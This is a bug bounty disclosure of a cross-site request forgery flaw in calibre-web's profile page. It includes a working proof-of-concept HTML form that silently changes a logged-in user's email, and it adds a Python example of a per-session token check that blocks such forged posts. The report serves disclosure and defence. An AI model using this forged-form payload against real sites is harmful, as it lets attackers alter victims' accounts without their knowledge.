Jul 23, 2021 - 3:04 p.m.

Cross-Site Request Forgery (CSRF) in janeczku/calibre-web

ibarrionuevo
www.huntr.dev
csrf
janeczku/calibre-web
user profile
security vulnerability
attacker
poc file
impact
bugbounty

✍️ Description

An attacker can make a logged-in user change their own profile settings through a CSRF vulnerability, using the PoC file below.
The profile form is submitted without a CSRF token, so the server cannot tell a forged cross-site post from a legitimate one.

🕵️‍♂️ Proof of Concept

For example, changing the email address from “[email protected]” to “[email protected]” (test1’s profile).
Make the logged-in user open a page containing this poc.html and submit the form:

// PoC.html
<html>
  <body>
  <script>history.pushState('', '', '/')</script>
    <form action="http://localhost:8083/me" method="POST">
      <input type="hidden" name="email" value="test1@test.comm" />
      <input type="hidden" name="kindle_mail" value="" />
      <input type="hidden" name="locale" value="en" />
      <input type="hidden" name="default_language" value="all" />
      <input type="hidden" name="show_16" value="on" />
      <input type="hidden" name="show_65536" value="on" />
      <input type="hidden" name="show_128" value="on" />
      <input type="hidden" name="show_256" value="on" />
      <input type="hidden" name="show_32" value="on" />
      <input type="hidden" name="show_8" value="on" />
      <input type="hidden" name="show_4" value="on" />
      <input type="hidden" name="show_64" value="on" />
      <input type="hidden" name="show_4096" value="on" />
      <input type="hidden" name="show_2" value="on" />
      <input type="hidden" name="show_8192" value="on" />
      <input type="hidden" name="show_16384" value="on" />
      <input type="hidden" name="show_32768" value="on" />
      <input type="hidden" name="show_131072" value="on" />
      <input type="submit" value="Submit request" />
    </form>
  </body>
</html>
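Added example (not calibre-web's code): the check that is missing above, a per-session synchronizer token on the profile form, written against a constructed stand-in for the POST /me handler. The in-memory session store, the helper names and the forged request body are assumptions built from the PoC's form fields.

```python
"""Synchronizer-token CSRF check for a profile-update endpoint (added example)."""
import hmac
import secrets
from urllib.parse import parse_qs

# Constructed in-memory session store: session id -> session data.
SESSIONS: dict[str, dict] = {}


def new_session(email: str) -> str:
    """Create a logged-in session and mint a random per-session CSRF token."""
    sid = secrets.token_urlsafe(16)
    SESSIONS[sid] = {"email": email, "csrf_token": secrets.token_urlsafe(32)}
    return sid


def profile_form_html(sid: str) -> str:
    """The legitimate form embeds the session token as a hidden field."""
    token = SESSIONS[sid]["csrf_token"]
    return (
        '<form action="/me" method="POST">'
        f'<input type="hidden" name="csrf_token" value="{token}" />'
        '<input name="email" /><input type="submit" /></form>'
    )


def handle_me_post(sid: str, body: str, check_csrf: bool = True) -> tuple[int, str]:
    """Process POST /me for the session identified by the victim's cookie.

    With check_csrf=False the handler models the vulnerable endpoint: any
    cross-site form post that rides on the victim's cookie is accepted.
    """
    session = SESSIONS[sid]
    form = {k: v[0] for k, v in parse_qs(body, keep_blank_values=True).items()}
    if check_csrf:
        token = form.get("csrf_token", "")
        # Constant-time compare. An attacker's page cannot read the token out
        # of the victim's session, so a forged post fails here.
        if not hmac.compare_digest(token.encode(), session["csrf_token"].encode()):
            return 400, "CSRF token missing or invalid"
    if "email" not in form:
        return 400, "email required"
    session["email"] = form["email"]
    return 302, "profile updated"


# Constructed body equivalent to the PoC form above (no csrf_token field).
FORGED_BODY = "email=test1%40test.comm&kindle_mail=&locale=en&default_language=all&show_16=on"
```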

💥 Impact

This vulnerability allows unwanted actions and changes to the profile of a user who did not notice the hidden intent of the page they opened.